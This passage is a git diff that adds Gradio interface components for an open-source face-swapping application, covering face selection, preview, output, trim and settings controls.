Optional[gradio.Dropdown] = None + + +def render() -> None: + global FACE_ANALYSER_DIRECTION_DROPDOWN + global FACE_ANALYSER_AGE_DROPDOWN + global FACE_ANALYSER_GENDER_DROPDOWN + + with gradio.Box(): + with gradio.Row(): + FACE_ANALYSER_DIRECTION_DROPDOWN = gradio.Dropdown( + label = wording.get('face_analyser_direction_dropdown_label'), + choices = DeepFakeAI.choices.face_analyser_direction, + value = DeepFakeAI.globals.face_analyser_direction + ) + FACE_ANALYSER_AGE_DROPDOWN = gradio.Dropdown( + label = wording.get('face_analyser_age_dropdown_label'), + choices = ['none'] + DeepFakeAI.choices.face_analyser_age, + value = DeepFakeAI.globals.face_analyser_age or 'none' + ) + FACE_ANALYSER_GENDER_DROPDOWN = gradio.Dropdown( + label = wording.get('face_analyser_gender_dropdown_label'), + choices = ['none'] + DeepFakeAI.choices.face_analyser_gender, + value = DeepFakeAI.globals.face_analyser_gender or 'none' + ) + ui.register_component('face_analyser_direction_dropdown', FACE_ANALYSER_DIRECTION_DROPDOWN) + ui.register_component('face_analyser_age_dropdown', FACE_ANALYSER_AGE_DROPDOWN) + ui.register_component('face_analyser_gender_dropdown', FACE_ANALYSER_GENDER_DROPDOWN) + + +def listen() -> None: + FACE_ANALYSER_DIRECTION_DROPDOWN.select(lambda value: update_dropdown('face_analyser_direction', value), inputs = FACE_ANALYSER_DIRECTION_DROPDOWN, outputs = FACE_ANALYSER_DIRECTION_DROPDOWN) + FACE_ANALYSER_AGE_DROPDOWN.select(lambda value: update_dropdown('face_analyser_age', value), inputs = FACE_ANALYSER_AGE_DROPDOWN, outputs = FACE_ANALYSER_AGE_DROPDOWN) + FACE_ANALYSER_GENDER_DROPDOWN.select(lambda value: update_dropdown('face_analyser_gender', value), inputs = FACE_ANALYSER_GENDER_DROPDOWN, outputs = FACE_ANALYSER_GENDER_DROPDOWN) + + +def update_dropdown(name : str, value : str) -> Update: + if value == 'none': + setattr(DeepFakeAI.globals, name, None) + else: + setattr(DeepFakeAI.globals, name, value) + return gradio.update(value = value) diff --git a/DeepFakeAI/uis/components/face_selector.py b/DeepFakeAI/uis/components/face_selector.py new file mode 100644 index 0000000000000000000000000000000000000000..b6f4c66e07c46ce0f961acbd99289e421cd4e619 --- /dev/null +++ b/DeepFakeAI/uis/components/face_selector.py @@ -0,0 +1,133 @@ +from typing import List, Optional, Tuple, Any, Dict +from time import sleep + +import cv2 +import gradio + +import DeepFakeAI.choices +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.capturer import get_video_frame +from DeepFakeAI.face_analyser import get_many_faces +from DeepFakeAI.face_reference import clear_face_reference +from DeepFakeAI.typing import Frame, FaceRecognition +from DeepFakeAI.uis import core as ui +from DeepFakeAI.uis.typing import ComponentName, Update +from DeepFakeAI.utilities import is_image, is_video + +FACE_RECOGNITION_DROPDOWN : Optional[gradio.Dropdown] = None +REFERENCE_FACE_POSITION_GALLERY : Optional[gradio.Gallery] = None +REFERENCE_FACE_DISTANCE_SLIDER : Optional[gradio.Slider] = None + + +def render() -> None: + global FACE_RECOGNITION_DROPDOWN + global REFERENCE_FACE_POSITION_GALLERY + global REFERENCE_FACE_DISTANCE_SLIDER + + with gradio.Box(): + reference_face_gallery_args: Dict[str, Any] = { + 'label': wording.get('reference_face_gallery_label'), + 'height': 120, + 'object_fit': 'cover', + 'columns': 10, + 'allow_preview': False, + 'visible': 'reference' in DeepFakeAI.globals.face_recognition + } + if is_image(DeepFakeAI.globals.target_path): + reference_frame = cv2.imread(DeepFakeAI.globals.target_path) + reference_face_gallery_args['value'] = extract_gallery_frames(reference_frame) + if is_video(DeepFakeAI.globals.target_path): + reference_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) + reference_face_gallery_args['value'] = extract_gallery_frames(reference_frame) + FACE_RECOGNITION_DROPDOWN = gradio.Dropdown( + label = wording.get('face_recognition_dropdown_label'), + choices = DeepFakeAI.choices.face_recognition, + value = DeepFakeAI.globals.face_recognition + ) + REFERENCE_FACE_POSITION_GALLERY = gradio.Gallery(**reference_face_gallery_args) + REFERENCE_FACE_DISTANCE_SLIDER = gradio.Slider( + label = wording.get('reference_face_distance_slider_label'), + value = DeepFakeAI.globals.reference_face_distance, + maximum = 3, + step = 0.05, + visible = 'reference' in DeepFakeAI.globals.face_recognition + ) + ui.register_component('face_recognition_dropdown', FACE_RECOGNITION_DROPDOWN) + ui.register_component('reference_face_position_gallery', REFERENCE_FACE_POSITION_GALLERY) + ui.register_component('reference_face_distance_slider', REFERENCE_FACE_DISTANCE_SLIDER) + + +def listen() -> None: + FACE_RECOGNITION_DROPDOWN.select(update_face_recognition, inputs = FACE_RECOGNITION_DROPDOWN, outputs = [ REFERENCE_FACE_POSITION_GALLERY, REFERENCE_FACE_DISTANCE_SLIDER ]) + REFERENCE_FACE_POSITION_GALLERY.select(clear_and_update_face_reference_position) + REFERENCE_FACE_DISTANCE_SLIDER.change(update_reference_face_distance, inputs = REFERENCE_FACE_DISTANCE_SLIDER) + update_component_names : List[ComponentName] =\ + [ + 'target_file', + 'preview_frame_slider' + ] + for component_name in update_component_names: + component = ui.get_component(component_name) + if component: + component.change(update_face_reference_position, outputs = REFERENCE_FACE_POSITION_GALLERY) + select_component_names : List[ComponentName] =\ + [ + 'face_analyser_direction_dropdown', + 'face_analyser_age_dropdown', + 'face_analyser_gender_dropdown' + ] + for component_name in select_component_names: + component = ui.get_component(component_name) + if component: + component.select(update_face_reference_position, outputs = REFERENCE_FACE_POSITION_GALLERY) + + +def update_face_recognition(face_recognition : FaceRecognition) -> Tuple[Update, Update]: + if face_recognition == 'reference': + DeepFakeAI.globals.face_recognition = face_recognition + return gradio.update(visible = True), gradio.update(visible = True) + if face_recognition == 'many': + DeepFakeAI.globals.face_recognition = face_recognition + return gradio.update(visible = False), gradio.update(visible = False) + + +def clear_and_update_face_reference_position(event: gradio.SelectData) -> Update: + clear_face_reference() + return update_face_reference_position(event.index) + + +def update_face_reference_position(reference_face_position : int = 0) -> Update: + sleep(0.2) + gallery_frames = [] + DeepFakeAI.globals.reference_face_position = reference_face_position + if is_image(DeepFakeAI.globals.target_path): + reference_frame = cv2.imread(DeepFakeAI.globals.target_path) + gallery_frames = extract_gallery_frames(reference_frame) + if is_video(DeepFakeAI.globals.target_path): + reference_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) + gallery_frames = extract_gallery_frames(reference_frame) + if gallery_frames: + return gradio.update(value = gallery_frames) + return gradio.update(value = None) + + +def update_reference_face_distance(reference_face_distance : float) -> Update: + DeepFakeAI.globals.reference_face_distance = reference_face_distance + return gradio.update(value = reference_face_distance) + + +def extract_gallery_frames(reference_frame : Frame) -> List[Frame]: + crop_frames = [] + faces = get_many_faces(reference_frame) + for face in faces: + start_x, start_y, end_x, end_y = map(int, face['bbox']) + padding_x = int((end_x - start_x) * 0.25) + padding_y = int((end_y - start_y) * 0.25) + start_x = max(0, start_x - padding_x) + start_y = max(0, start_y - padding_y) + end_x = max(0, end_x + padding_x) + end_y = max(0, end_y + padding_y) + crop_frame = reference_frame[start_y:end_y, start_x:end_x] + crop_frames.append(ui.normalize_frame(crop_frame)) + return crop_frames diff --git a/DeepFakeAI/uis/components/output.py b/DeepFakeAI/uis/components/output.py new file mode 100644 index 0000000000000000000000000000000000000000..f2f1736e9b6b6e9b394cbdfd635b87a570fa6f72 --- /dev/null +++ b/DeepFakeAI/uis/components/output.py @@ -0,0 +1,55 @@ +from typing import Tuple, Optional +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.core import conditional_process +from DeepFakeAI.uis.typing import Update +from DeepFakeAI.utilities import is_image, is_video, normalize_output_path, clear_temp + +OUTPUT_START_BUTTON : Optional[gradio.Button] = None +OUTPUT_CLEAR_BUTTON : Optional[gradio.Button] = None +OUTPUT_IMAGE : Optional[gradio.Image] = None +OUTPUT_VIDEO : Optional[gradio.Video] = None + + +def render() -> None: + global OUTPUT_START_BUTTON + global OUTPUT_CLEAR_BUTTON + global OUTPUT_IMAGE + global OUTPUT_VIDEO + + with gradio.Row(): + with gradio.Box(): + OUTPUT_IMAGE = gradio.Image( + label = wording.get('output_image_or_video_label'), + visible = False + ) + OUTPUT_VIDEO = gradio.Video( + label = wording.get('output_image_or_video_label') + ) + with gradio.Row(): + OUTPUT_START_BUTTON = gradio.Button(wording.get('start_button_label')) + OUTPUT_CLEAR_BUTTON = gradio.Button(wording.get('clear_button_label')) + + +def listen() -> None: + OUTPUT_START_BUTTON.click(update, outputs = [ OUTPUT_IMAGE, OUTPUT_VIDEO ]) + OUTPUT_CLEAR_BUTTON.click(clear, outputs = [ OUTPUT_IMAGE, OUTPUT_VIDEO ]) + + +def update() -> Tuple[Update, Update]: + DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, '.') + if DeepFakeAI.globals.output_path: + conditional_process() + if is_image(DeepFakeAI.globals.output_path): + return gradio.update(value = DeepFakeAI.globals.output_path, visible = True), gradio.update(value = None, visible = False) + if is_video(DeepFakeAI.globals.output_path): + return gradio.update(value = None, visible = False), gradio.update(value = DeepFakeAI.globals.output_path, visible = True) + return gradio.update(value = None, visible = False), gradio.update(value = None, visible = False) + + +def clear() -> Tuple[Update, Update]: + if DeepFakeAI.globals.target_path: + clear_temp(DeepFakeAI.globals.target_path) + return gradio.update(value = None), gradio.update(value = None) diff --git a/DeepFakeAI/uis/components/output_settings.py b/DeepFakeAI/uis/components/output_settings.py new file mode 100644 index 0000000000000000000000000000000000000000..4146cd955361fe738525c50b033054a6ae1b3a82 --- /dev/null +++ b/DeepFakeAI/uis/components/output_settings.py @@ -0,0 +1,43 @@ +from typing import Optional +import gradio + +import DeepFakeAI.choices +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.typing import OutputVideoEncoder +from DeepFakeAI.uis.typing import Update + +OUTPUT_VIDEO_ENCODER_DROPDOWN : Optional[gradio.Dropdown] = None +OUTPUT_VIDEO_QUALITY_SLIDER : Optional[gradio.Slider] = None + + +def render() -> None: + global OUTPUT_VIDEO_ENCODER_DROPDOWN + global OUTPUT_VIDEO_QUALITY_SLIDER + + with gradio.Box(): + OUTPUT_VIDEO_ENCODER_DROPDOWN = gradio.Dropdown( + label = wording.get('output_video_encoder_dropdown_label'), + choices = DeepFakeAI.choices.output_video_encoder, + value = DeepFakeAI.globals.output_video_encoder + ) + OUTPUT_VIDEO_QUALITY_SLIDER = gradio.Slider( + label = wording.get('output_video_quality_slider_label'), + value = DeepFakeAI.globals.output_video_quality, + step = 1 + ) + + +def listen() -> None: + OUTPUT_VIDEO_ENCODER_DROPDOWN.select(update_output_video_encoder, inputs = OUTPUT_VIDEO_ENCODER_DROPDOWN, outputs = OUTPUT_VIDEO_ENCODER_DROPDOWN) + OUTPUT_VIDEO_QUALITY_SLIDER.change(update_output_video_quality, inputs = OUTPUT_VIDEO_QUALITY_SLIDER, outputs = OUTPUT_VIDEO_QUALITY_SLIDER) + + +def update_output_video_encoder(output_video_encoder: OutputVideoEncoder) -> Update: + DeepFakeAI.globals.output_video_encoder = output_video_encoder + return gradio.update(value = output_video_encoder) + + +def update_output_video_quality(output_video_quality : int) -> Update: + DeepFakeAI.globals.output_video_quality = output_video_quality + return gradio.update(value = output_video_quality) diff --git a/DeepFakeAI/uis/components/preview.py b/DeepFakeAI/uis/components/preview.py new file mode 100644 index 0000000000000000000000000000000000000000..f86acaacc7f83c814d73b29186e019e97034a45e --- /dev/null +++ b/DeepFakeAI/uis/components/preview.py @@ -0,0 +1,121 @@ +from time import sleep +from typing import Any, Dict, Tuple, List, Optional +import cv2 +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.capturer import get_video_frame, get_video_frame_total +from DeepFakeAI.face_analyser import get_one_face +from DeepFakeAI.face_reference import get_face_reference, set_face_reference +from DeepFakeAI.predictor import predict_frame +from DeepFakeAI.processors.frame.core import load_frame_processor_module +from DeepFakeAI.typing import Frame +from DeepFakeAI.uis import core as ui +from DeepFakeAI.uis.typing import ComponentName, Update +from DeepFakeAI.utilities import is_video, is_image + +PREVIEW_IMAGE : Optional[gradio.Image] = None +PREVIEW_FRAME_SLIDER : Optional[gradio.Slider] = None + + +def render() -> None: + global PREVIEW_IMAGE + global PREVIEW_FRAME_SLIDER + + with gradio.Box(): + preview_image_args: Dict[str, Any] = { + 'label': wording.get('preview_image_label') + } + preview_frame_slider_args: Dict[str, Any] = { + 'label': wording.get('preview_frame_slider_label'), + 'step': 1, + 'visible': False + } + if is_image(DeepFakeAI.globals.target_path): + target_frame = cv2.imread(DeepFakeAI.globals.target_path) + preview_frame = extract_preview_frame(target_frame) + preview_image_args['value'] = ui.normalize_frame(preview_frame) + if is_video(DeepFakeAI.globals.target_path): + temp_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) + preview_frame = extract_preview_frame(temp_frame) + preview_image_args['value'] = ui.normalize_frame(preview_frame) + preview_image_args['visible'] = True + preview_frame_slider_args['value'] = DeepFakeAI.globals.reference_frame_number + preview_frame_slider_args['maximum'] = get_video_frame_total(DeepFakeAI.globals.target_path) + preview_frame_slider_args['visible'] = True + PREVIEW_IMAGE = gradio.Image(**preview_image_args) + PREVIEW_FRAME_SLIDER = gradio.Slider(**preview_frame_slider_args) + ui.register_component('preview_frame_slider', PREVIEW_FRAME_SLIDER) + + +def listen() -> None: + PREVIEW_FRAME_SLIDER.change(update, inputs = PREVIEW_FRAME_SLIDER, outputs = [ PREVIEW_IMAGE, PREVIEW_FRAME_SLIDER ]) + update_component_names : List[ComponentName] =\ + [ + 'source_file', + 'target_file', + 'face_recognition_dropdown', + 'reference_face_distance_slider', + 'frame_processors_checkbox_group' + ] + for component_name in update_component_names: + component = ui.get_component(component_name) + if component: + component.change(update, inputs = PREVIEW_FRAME_SLIDER, outputs = [ PREVIEW_IMAGE, PREVIEW_FRAME_SLIDER ]) + select_component_names : List[ComponentName] =\ + [ + 'reference_face_position_gallery', + 'face_analyser_direction_dropdown', + 'face_analyser_age_dropdown', + 'face_analyser_gender_dropdown' + ] + for component_name in select_component_names: + component = ui.get_component(component_name) + if component: + component.select(update, inputs = PREVIEW_FRAME_SLIDER, outputs = [ PREVIEW_IMAGE, PREVIEW_FRAME_SLIDER ]) + + +def update(frame_number : int = 0) -> Tuple[Update, Update]: + sleep(0.1) + if is_image(DeepFakeAI.globals.target_path): + target_frame = cv2.imread(DeepFakeAI.globals.target_path) + preview_frame = extract_preview_frame(target_frame) + return gradio.update(value = ui.normalize_frame(preview_frame)), gradio.update(value = None, maximum = None, visible = False) + if is_video(DeepFakeAI.globals.target_path): + DeepFakeAI.globals.reference_frame_number = frame_number + video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path) + temp_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) + preview_frame = extract_preview_frame(temp_frame) + return gradio.update(value = ui.normalize_frame(preview_frame)), gradio.update(maximum = video_frame_total, visible = True) + return gradio.update(value = None), gradio.update(value = None, maximum = None, visible = False) + + +def extract_preview_frame(temp_frame : Frame) -> Frame: + if predict_frame(temp_frame): + return cv2.GaussianBlur(temp_frame, (99, 99), 0) + source_face = get_one_face(cv2.imread(DeepFakeAI.globals.source_path)) if DeepFakeAI.globals.source_path else None + temp_frame = reduce_preview_frame(temp_frame) + if 'reference' in DeepFakeAI.globals.face_recognition and not get_face_reference(): + reference_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) + reference_face = get_one_face(reference_frame, DeepFakeAI.globals.reference_face_position) + set_face_reference(reference_face) + reference_face = get_face_reference() if 'reference' in DeepFakeAI.globals.face_recognition else None + for frame_processor in DeepFakeAI.globals.frame_processors: + frame_processor_module = load_frame_processor_module(frame_processor) + if frame_processor_module.pre_process(): + temp_frame = frame_processor_module.process_frame( + source_face, + reference_face, + temp_frame + ) + return temp_frame + + +def reduce_preview_frame(temp_frame : Frame, max_height : int = 480) -> Frame: + height, width = temp_frame.shape[:2] + if height > max_height: + scale = max_height / height + max_width = int(width * scale) + temp_frame = cv2.resize(temp_frame, (max_width, max_height)) + return temp_frame diff --git a/DeepFakeAI/uis/components/processors.py b/DeepFakeAI/uis/components/processors.py new file mode 100644 index 0000000000000000000000000000000000000000..b87da139b019f6c51a1adc45ad65a09f4578aa66 --- /dev/null +++ b/DeepFakeAI/uis/components/processors.py @@ -0,0 +1,41 @@ +from typing import List, Optional +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.processors.frame.core import load_frame_processor_module, clear_frame_processors_modules +from DeepFakeAI.uis import core as ui +from DeepFakeAI.uis.typing import Update +from DeepFakeAI.utilities import list_module_names + +FRAME_PROCESSORS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None + + +def render() -> None: + global FRAME_PROCESSORS_CHECKBOX_GROUP + + with gradio.Box(): + FRAME_PROCESSORS_CHECKBOX_GROUP = gradio.CheckboxGroup( + label = wording.get('frame_processors_checkbox_group_label'), + choices = sort_frame_processors(DeepFakeAI.globals.frame_processors), + value = DeepFakeAI.globals.frame_processors + ) + ui.register_component('frame_processors_checkbox_group', FRAME_PROCESSORS_CHECKBOX_GROUP) + + +def listen() -> None: + FRAME_PROCESSORS_CHECKBOX_GROUP.change(update_frame_processors, inputs = FRAME_PROCESSORS_CHECKBOX_GROUP, outputs = FRAME_PROCESSORS_CHECKBOX_GROUP) + + +def update_frame_processors(frame_processors : List[str]) -> Update: + clear_frame_processors_modules() + DeepFakeAI.globals.frame_processors = frame_processors + for frame_processor in DeepFakeAI.globals.frame_processors: + frame_processor_module = load_frame_processor_module(frame_processor) + frame_processor_module.pre_check() + return gradio.update(value = frame_processors, choices = sort_frame_processors(frame_processors)) + + +def sort_frame_processors(frame_processors : List[str]) -> list[str]: + frame_processors_names = list_module_names('DeepFakeAI/processors/frame/modules') + return sorted(frame_processors_names, key = lambda frame_processor : frame_processors.index(frame_processor) if frame_processor in frame_processors else len(frame_processors)) diff --git a/DeepFakeAI/uis/components/settings.py b/DeepFakeAI/uis/components/settings.py new file mode 100644 index 0000000000000000000000000000000000000000..ec5c30b023f0ea5563a58dbaa5ea993a53ffba86 --- /dev/null +++ b/DeepFakeAI/uis/components/settings.py @@ -0,0 +1,41 @@ +from typing import Optional +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.uis.typing import Update + +KEEP_FPS_CHECKBOX : Optional[gradio.Checkbox] = None +KEEP_TEMP_CHECKBOX : Optional[gradio.Checkbox] = None +SKIP_AUDIO_CHECKBOX : Optional[gradio.Checkbox] = None + + +def render() -> None: + global KEEP_FPS_CHECKBOX + global KEEP_TEMP_CHECKBOX + global SKIP_AUDIO_CHECKBOX + + with gradio.Box(): + KEEP_FPS_CHECKBOX = gradio.Checkbox( + label = wording.get('keep_fps_checkbox_label'), + value = DeepFakeAI.globals.keep_fps + ) + KEEP_TEMP_CHECKBOX = gradio.Checkbox( + label = wording.get('keep_temp_checkbox_label'), + value = DeepFakeAI.globals.keep_temp + ) + SKIP_AUDIO_CHECKBOX = gradio.Checkbox( + label = wording.get('skip_audio_checkbox_label'), + value = DeepFakeAI.globals.skip_audio + ) + + +def listen() -> None: + KEEP_FPS_CHECKBOX.change(lambda value: update_checkbox('keep_fps', value), inputs = KEEP_FPS_CHECKBOX, outputs = KEEP_FPS_CHECKBOX) + KEEP_TEMP_CHECKBOX.change(lambda value: update_checkbox('keep_temp', value), inputs = KEEP_TEMP_CHECKBOX, outputs = KEEP_TEMP_CHECKBOX) + SKIP_AUDIO_CHECKBOX.change(lambda value: update_checkbox('skip_audio', value), inputs = SKIP_AUDIO_CHECKBOX, outputs = SKIP_AUDIO_CHECKBOX) + + +def update_checkbox(name : str, value: bool) -> Update: + setattr(DeepFakeAI.globals, name, value) + return gradio.update(value = value) diff --git a/DeepFakeAI/uis/components/source.py b/DeepFakeAI/uis/components/source.py new file mode 100644 index 0000000000000000000000000000000000000000..29b77715b0648d49761a466bb9374dd7c32c4150 --- /dev/null +++ b/DeepFakeAI/uis/components/source.py @@ -0,0 +1,48 @@ +from typing import Any, IO, Optional +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.uis import core as ui +from DeepFakeAI.uis.typing import Update +from DeepFakeAI.utilities import is_image + +SOURCE_FILE : Optional[gradio.File] = None +SOURCE_IMAGE : Optional[gradio.Image] = None + + +def render() -> None: + global SOURCE_FILE + global SOURCE_IMAGE + + with gradio.Box(): + is_source_image = is_image(DeepFakeAI.globals.source_path) + SOURCE_FILE = gradio.File( + file_count = 'single', + file_types= + [ + '.png', + '.jpg', + '.webp' + ], + label = wording.get('source_file_label'), + value = DeepFakeAI.globals.source_path if is_source_image else None + ) + ui.register_component('source_file', SOURCE_FILE) + SOURCE_IMAGE = gradio.Image( + value = SOURCE_FILE.value['name'] if is_source_image else None, + visible = is_source_image, + show_label = False + ) + + +def listen() -> None: + SOURCE_FILE.change(update, inputs = SOURCE_FILE, outputs = SOURCE_IMAGE) + + +def update(file: IO[Any]) -> Update: + if file and is_image(file.name): + DeepFakeAI.globals.source_path = file.name + return gradio.update(value = file.name, visible = True) + DeepFakeAI.globals.source_path = None + return gradio.update(value = None, visible = False) diff --git a/DeepFakeAI/uis/components/target.py b/DeepFakeAI/uis/components/target.py new file mode 100644 index 0000000000000000000000000000000000000000..022cd8da664e0555e79f61bb875ffca47f98589e --- /dev/null +++ b/DeepFakeAI/uis/components/target.py @@ -0,0 +1,62 @@ +from typing import Any, IO, Tuple, Optional +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.face_reference import clear_face_reference +from DeepFakeAI.uis import core as ui +from DeepFakeAI.uis.typing import Update +from DeepFakeAI.utilities import is_image, is_video + +TARGET_FILE : Optional[gradio.File] = None +TARGET_IMAGE : Optional[gradio.Image] = None +TARGET_VIDEO : Optional[gradio.Video] = None + + +def render() -> None: + global TARGET_FILE + global TARGET_IMAGE + global TARGET_VIDEO + + with gradio.Box(): + is_target_image = is_image(DeepFakeAI.globals.target_path) + is_target_video = is_video(DeepFakeAI.globals.target_path) + TARGET_FILE = gradio.File( + label = wording.get('target_file_label'), + file_count = 'single', + file_types = + [ + '.png', + '.jpg', + '.webp', + '.mp4' + ], + value = DeepFakeAI.globals.target_path if is_target_image or is_target_video else None + ) + TARGET_IMAGE = gradio.Image( + value = TARGET_FILE.value['name'] if is_target_image else None, + visible = is_target_image, + show_label = False + ) + TARGET_VIDEO = gradio.Video( + value = TARGET_FILE.value['name'] if is_target_video else None, + visible = is_target_video, + show_label = False + ) + ui.register_component('target_file', TARGET_FILE) + + +def listen() -> None: + TARGET_FILE.change(update, inputs = TARGET_FILE, outputs = [ TARGET_IMAGE, TARGET_VIDEO ]) + + +def update(file : IO[Any]) -> Tuple[Update, Update]: + clear_face_reference() + if file and is_image(file.name): + DeepFakeAI.globals.target_path = file.name + return gradio.update(value = file.name, visible = True), gradio.update(value = None, visible = False) + if file and is_video(file.name): + DeepFakeAI.globals.target_path = file.name + return gradio.update(value = None, visible = False), gradio.update(value = file.name, visible = True) + DeepFakeAI.globals.target_path = None + return gradio.update(value = None, visible = False), gradio.update(value = None, visible = False) diff --git a/DeepFakeAI/uis/components/temp_frame.py b/DeepFakeAI/uis/components/temp_frame.py new file mode 100644 index 0000000000000000000000000000000000000000..e1236f787144a8f87b8809c862f790f2abe5186c --- /dev/null +++ b/DeepFakeAI/uis/components/temp_frame.py @@ -0,0 +1,44 @@ +from typing import Optional +import gradio + +import DeepFakeAI.choices +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.typing import TempFrameFormat + +from DeepFakeAI.uis.typing import Update + +TEMP_FRAME_FORMAT_DROPDOWN : Optional[gradio.Dropdown] = None +TEMP_FRAME_QUALITY_SLIDER : Optional[gradio.Slider] = None + + +def render() -> None: + global TEMP_FRAME_FORMAT_DROPDOWN + global TEMP_FRAME_QUALITY_SLIDER + + with gradio.Box(): + TEMP_FRAME_FORMAT_DROPDOWN = gradio.Dropdown( + label = wording.get('temp_frame_format_dropdown_label'), + choices = DeepFakeAI.choices.temp_frame_format, + value = DeepFakeAI.globals.temp_frame_format + ) + TEMP_FRAME_QUALITY_SLIDER = gradio.Slider( + label = wording.get('temp_frame_quality_slider_label'), + value = DeepFakeAI.globals.temp_frame_quality, + step = 1 + ) + + +def listen() -> None: + TEMP_FRAME_FORMAT_DROPDOWN.select(update_temp_frame_format, inputs = TEMP_FRAME_FORMAT_DROPDOWN, outputs = TEMP_FRAME_FORMAT_DROPDOWN) + TEMP_FRAME_QUALITY_SLIDER.change(update_temp_frame_quality, inputs = TEMP_FRAME_QUALITY_SLIDER, outputs = TEMP_FRAME_QUALITY_SLIDER) + + +def update_temp_frame_format(temp_frame_format : TempFrameFormat) -> Update: + DeepFakeAI.globals.temp_frame_format = temp_frame_format + return gradio.update(value = temp_frame_format) + + +def update_temp_frame_quality(temp_frame_quality : int) -> Update: + DeepFakeAI.globals.temp_frame_quality = temp_frame_quality + return gradio.update(value = temp_frame_quality) diff --git a/DeepFakeAI/uis/components/trim_frame.py b/DeepFakeAI/uis/components/trim_frame.py new file mode 100644 index 0000000000000000000000000000000000000000..cf95f81e36e32ebcd7acbdfd4e15fb78618ce0c3 --- /dev/null +++ b/DeepFakeAI/uis/components/trim_frame.py @@ -0,0 +1,65 @@ +from time import sleep +from typing import Any, Dict, Tuple, Optional + +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.capturer import get_video_frame_total +from DeepFakeAI.uis import core as ui +from DeepFakeAI.uis.typing import Update +from DeepFakeAI.utilities import is_video + +TRIM_FRAME_START_SLIDER : Optional[gradio.Slider] = None +TRIM_FRAME_END_SLIDER : Optional[gradio.Slider] = None + + +def render() -> None: + global TRIM_FRAME_START_SLIDER + global TRIM_FRAME_END_SLIDER + + with gradio.Box(): + trim_frame_start_slider_args : Dict[str, Any] = { + 'label': wording.get('trim_frame_start_slider_label'), + 'step': 1, + 'visible': False + } + trim_frame_end_slider_args : Dict[str, Any] = { + 'label': wording.get('trim_frame_end_slider_label'), + 'step': 1, + 'visible': False + } + if is_video(DeepFakeAI.globals.target_path): + video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path) + trim_frame_start_slider_args['value'] = DeepFakeAI.globals.trim_frame_start or 0 + trim_frame_start_slider_args['maximum'] = video_frame_total + trim_frame_start_slider_args['visible'] = True + trim_frame_end_slider_args['value'] = DeepFakeAI.globals.trim_frame_end or video_frame_total + trim_frame_end_slider_args['maximum'] = video_frame_total + trim_frame_end_slider_args['visible'] = True + with gradio.Row(): + TRIM_FRAME_START_SLIDER = gradio.Slider(**trim_frame_start_slider_args) + TRIM_FRAME_END_SLIDER = gradio.Slider(**trim_frame_end_slider_args) + + +def listen() -> None: + target_file = ui.get_component('target_file') + if target_file: + target_file.change(remote_update, outputs = [ TRIM_FRAME_START_SLIDER, TRIM_FRAME_END_SLIDER ]) + TRIM_FRAME_START_SLIDER.change(lambda value : update_number('trim_frame_start', int(value)), inputs = TRIM_FRAME_START_SLIDER, outputs = TRIM_FRAME_START_SLIDER) + TRIM_FRAME_END_SLIDER.change(lambda value : update_number('trim_frame_end', int(value)), inputs = TRIM_FRAME_END_SLIDER, outputs = TRIM_FRAME_END_SLIDER) + + +def remote_update() -> Tuple[Update, Update]: + sleep(0.1) + if is_video(DeepFakeAI.globals.target_path): + video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path) + DeepFakeAI.globals.trim_frame_start = 0 + DeepFakeAI.globals.trim_frame_end = video_frame_total + return gradio.update(value = 0, maximum = video_frame_total, visible = True), gradio.update(value = video_frame_total, maximum = video_frame_total, visible = True) + return gradio.update(value = None, maximum = None, visible = False), gradio.update(value = None, maximum = None, visible = False) + + +def update_number(name : str, value : int) -> Update: + setattr(DeepFakeAI.globals, name, value) + return gradio.update(value = value) diff --git a/DeepFakeAI/uis/core.py b/DeepFakeAI/uis/core.py new file mode 100644 index 0000000000000000000000000000000000000000..8db45e59b4fd981bc9e0866d1ccc135475219b68 --- /dev/null +++ b/DeepFakeAI/uis/core.py @@ -0,0 +1,67 @@ +from typing import Dict, Optional, Any +import importlib +import sys +import cv2 +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import metadata, wording +from DeepFakeAI.typing import Frame +from DeepFakeAI.uis.typing import Component, ComponentName + +COMPONENTS: Dict[ComponentName, Component] = {} +UI_LAYOUT_METHODS =\ +[ + 'pre_check', + 'render', + 'listen' +] + + +def launch() -> None: + with gradio.Blocks(theme = get_theme(), title = metadata.get('name') + ' ' + metadata.get('version')) as ui: + for ui_layout in DeepFakeAI.globals.ui_layouts: + ui_layout_module = load_ui_layout_module(ui_layout) + ui_layout_module.pre_check() + ui_layout_module.render() + ui_layout_module.listen() + ui.launch(debug=True, show_api=True) + + +def load_ui_layout_module(ui_layout : str) -> Any: + try: + ui_layout_module = importlib.import_module('DeepFakeAI.uis.layouts.' + ui_layout) + for method_name in UI_LAYOUT_METHODS: + if not hasattr(ui_layout_module, method_name): + raise NotImplementedError + except ModuleNotFoundError: + sys.exit(wording.get('ui_layout_not_loaded').format(ui_layout = ui_layout)) + except NotImplementedError: + sys.exit(wording.get('ui_layout_not_implemented').format(ui_layout = ui_layout)) + return ui_layout_module + + +def get_theme() -> gradio.Theme: + return gradio.themes.Soft( + primary_hue = gradio.themes.colors.red, + secondary_hue = gradio.themes.colors.gray, + font = gradio.themes.GoogleFont('Inter') + ).set( + background_fill_primary = 